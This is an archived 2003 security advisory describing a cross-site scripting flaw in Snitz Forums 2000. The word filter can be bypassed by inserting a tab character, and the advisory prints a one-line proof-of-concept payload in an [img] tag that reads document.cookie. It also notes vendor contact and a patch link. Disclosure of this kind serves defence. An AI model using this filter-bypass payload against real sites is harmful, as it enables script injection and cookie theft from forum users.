logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

CrossSite Scripting @ Snitz Forums 2000
Date: 2003-04-18

Author : badwebmasters@online.de <badwebmasters@online.de>

Description:

The BadWord-(Script-)Filter can be tricked by adding the Tab-Char (0x09)
into the script command. This may lead to CrossSite-Scripting.


Exploit:

[img]jav asc ript:alert%28document.cookie%29[/img]


Vendor:

Has been contacted on 15. April.


Patch:

Available at http://int23.online.de/badwebmasters/txt/adv011.txt

greetZ bWM



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy